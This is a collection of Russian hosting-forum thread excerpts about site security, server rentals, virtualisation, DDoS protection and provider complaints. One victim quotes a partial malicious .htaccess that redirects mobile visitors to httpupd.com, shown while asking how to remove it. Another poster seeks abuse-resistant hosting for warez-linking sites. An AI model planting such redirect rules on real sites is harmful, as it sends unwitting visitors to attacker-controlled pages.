Вредноносные коды, как обезопасить сайты (виртуальный хостинг)

Приветствую всех! Сам я не сильно разбираюсь в серверном администрировании и хостингах, на базовом уровне. Хотел спросить совета у спецов, как можно обезопасить свои сайты от добавления на них вредноносных строчек. Сайты в своем большинстве у меня на DLE, остальная меньшая часть на WP. WP вроде бы живут без проблем, а вот на DLE постоянно появляются вредноносные коды, чистить которые мне уже порядочно надоело. В папках сайтов очень часто появляются шеллы, особенно в директориях uploads/fotos

Все что смог сделать со своей стороны, это добавить .htaccess файл в папку uploads запрещающий загрузку php файлов и ограничил доступ к FTP по IP, но сайты по прежнему «долбят».

Господа мастера и гуру, просьба поделиться советом и подсказать какие еще действия можно предпринять для устранения проблем с сайтами, помимо обновления дистрибутивов DLE и поиска дырок в скриптах.

Вредоносный .htaccess как избавиться от заразы ?

Добрый день. У меня следующая проблема.

На всех сайтах моего хостера (все сайты на одном аккаунте их около 20) регулярно подменяется .htaccess на вредоносный, такого вида.

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]

… тут еще много всего перечислено…

RewriteRule ^(.*)$ httpupd.com/s/4087 [L,R=302]

Притом это не зависит от движка сайта (Joomla, Wordpress или голый HTML), меняется даже там где всего лишь один единственный index.html

Обратился к хостеру, посоветовали поменять пароли и закрыть доступ по ftp
Читать дальше

нужно 2 сервера

нужны 2 сервера с одинаковыми параметрами (ориентир):

Intel® Core™ i7-920 Quad-Core

4 ядра,

4 виртуальных (hyper-threading) 2 x 750 GB HDD SATA2

(software RAID1) 16 GB DDR3

один сервер в Leasweb, другой максимально рядом с ним, но в другом ДЦ… для кластера

просьба дать ссылки на обе конфигурации на вашем сайте, также укажите сроки включения серверов в личку

К обоим нужен постоянный kvm и адекватная быстрая поддержка 24x7

ХОСТЕРЫ МОГУТ ПРЕДЛАГАТЬ, НУЖНЫ МАКСИМАЛЬНО ОПЕРАТИВНО ОБЕ ЖЕЛЕЗКИ

Ищу сервер (ы) для своих проектов на длительный период

Доброго времени суток!

Ищу сервер (ы) для своих проектов, тематика проектов разная юмор, варез (ссылки на ФО) и пожалуй самые крупные это музыкальные сайты, треки отдаются самого сервера, что касается абуз, за 5 лет еще не одной абузы не было, но даже если будет серьезная абуза решим, в любом случаи, не хотелось бы иметь дело, кто по первой же абузе отключит сервер. (В идеале хотелось бы абузостойчивый ДЦ)

Нужны надежные ребята с дружелюбным оперативным Русским суппортом )

И так пожелания:

1) Возможность оплачивать через Web Money Z R

2) Размещения сервера хотелось бы за пределами РФ и Украины с хорошим пингом в РФ и СНГ

Что касается сервера, приблизительно нужно:

1) Мать Supermicro, Dell с возможностью размещения в корзине 8 дисков ( а то и более если это возможно, так как нагрузка в основном на диски и канал)
Читать дальше

Вопрос по виртуализации OpenVZ

Добрый день!

Требуется помощь в определении виртуализации на уже запущенной VDS.

Хостер говорит что это OpenVZ, но при этом уточняет, что за отведенные мне лимиты по памяти и CPU вылезти я не могу. Разве это OpenVZ? Другая отличительная особенность на этой вирт.машине — есть SWAP.

На другой моей вирт. машине с OpenVZ, SWAP всегда равен 0

0k total, 0k used, 0k free, 0k cached
тут же:

Swap: 1048576k total, 0k used, 1048576k free, 11540k cached
как определить под какой виртуализацией работает вирт.сервер и какие отличительные особенности OpenVZ от других?

Ищу серверы для своих проектов на длительный период 2

Доброго времени суток!

Ищу сервер (ы) для своих проектов, тематика проектов разная юмор, варез (ссылки на ФО) и пожалуй самые крупные это музыкальные сайты, треки отдаются самого сервера, что касается абуз, за 5 лет еще не одной абузы не было, но даже если будет серьезная абуза решим, в любом случаи, не хотелось бы иметь дело, кто по первой же абузе отключит сервер. (В идеале хотелось бы абузостойчивый ДЦ)

Господа хостеры, прошу прощения, связи с тем что, решили разнести сайты на разные сервера, потребность в одном мощном сервере изменилась, на данный момент нужно 2 сервера. (чуть позже и 3 сервер)

Актуальность поиска 1 сутки, max 2-e суток, именно за это период хотелось найти сервера и получить их в свое распоряжение!

Если будут хорошие предложения, условия, цены, готов сегодня вечером уже оплатить, за аренду серверов!

И так пожелания:

1) Возможность оплачивать через Web Money Z R
Читать дальше

Халатность rootpanel, либо попытка заработать

Возникла такая проблема с биллинг-панелью rootpanel

Уже более полутора лет работаю с реселлером этого биллинга zeoshost.

Постоянно администратор продлевал лицензию, а так же обновлял.Но в последние 3-4 месяца администратор никак не выходит на контакт.

Написал Ростиславу, он ответил — что никак не может помочь так-как он не отвечает за своих реселлеров.

Получается продление лицензии, и обновление только через zeoshost, либо платить 15$ чтобы перейти на обслуживание к rootpanel

Ну всё таки я 3 дня назад сумел достучатся, написал что у меня есть 6 дней чтобы продлить лицензию.Был ответ что напишут когда разработчик вышлет её! В правилах Ростислава лицензия высылается в тот-же день, но увы прошло 3 дня.

Сейчас же я опять пишу своему реселлеру, и в тикеты, и в Keeper(основной контакт где администратор в сети), но одно молчание, хотя он в сети и видны следы активности…
Читать дальше

Вопрос по защите сервера от канального DDoS (интересуют предложения)

Добрый день, друзья!

Очень нужен совет знающих в таком вопросе

Держу один сервер, где размещаются несколько партнерских проектов + пара на платной основе

Специфика проектов такова, что их часто атакуют http-флудом — сервер настроен соответствующим образом, применяются свои небольшие наработки, все отражается успешно

Но вот бывает проблема — если на кого-то начинается более мощный «канальный» флуд, например с пары выделенных серверов, тогда ДЦ блокирует IP за атаку (70-200 Mbit)

Вероятно, где-то есть возможность снять в аренду или порт для проксирования или небольшой сервер под защитой, или хоть впску?

Главная задача — сравнительно невысокая цена и возможность не держать его постоянно, а подключать при необходимости. Чтобы можно было проксировать чистый трафик на свой сервер, а канальный флуд на уровне 70-200 Mbit успешно отражался
Читать дальше

О нагрузке на сервер + тип хостинга под конкретный сайт

Хотелось бы уточнить у многоуважаемых представителей хост-компаний:

Есть сайт, посещаемость в районе 1500 уников/сутки. Самописная CMS(php + mysql), достаточно легкая. Из нагруженных моментов только формирование миниатюр изображений средствами php в статику (разовые операции при добавлении/обновлении изображения товара, из картинки 500кб формируется еще две, на 50 и 5кб). Sweb (да, г… но, но что поделать), практически раз в пять минут при интенсивном серфинге по сайту выдает 503 ошибку. Обращаться к ним в ТП смысла никакого нет (ответ думаю известен, ВИП и тп, расширенных ответов получить невозможно). Ограничения у них на количество процессов — 32 на аккаунт.

Вопрос — 32 процесса — с учетом инклудов? Какие именно процессы имеются в виду? Всвязи с чем вообще может так часто вылезать 503 ошибка, кроме ограничения на данные 32 процесса — никак не пойму, но почему-то кажется, что не по моей вине.

Вопрос№2 — при всем вышеописанном, достаточно ли просто сменить хостера, или нужно реально думать о смене тарифного плана, VDS/VPS (с названиями могу ошибаться, небыло смысла разбираться, ничего от root вроде не надо)
Читать дальше
,

Datacheap.ru - Остерегайтесь!

col13140

Постоянные отключения сервера (падение сети) с момента предоставления услуг.

Начнем все по порядку

На следующий день после предоставления услуг размещения сервера потребовался KVM, обратился в службу поддержки, оказалось на весь датацентр всего один KVM да и тот не рабочий.

Datacheap.ru (13:21:40 4/05/2012)

передал руковдству, занимаються(ремонтируют), когда всё сделают не известно, но в ближайшеее время

Datacheap.ru (16:39:43 4/05/2012)

всё класс, всё завелось

Datacheap.ru (16:39:52 4/05/2012)

заходите на 5 квм.
Читать дальше
,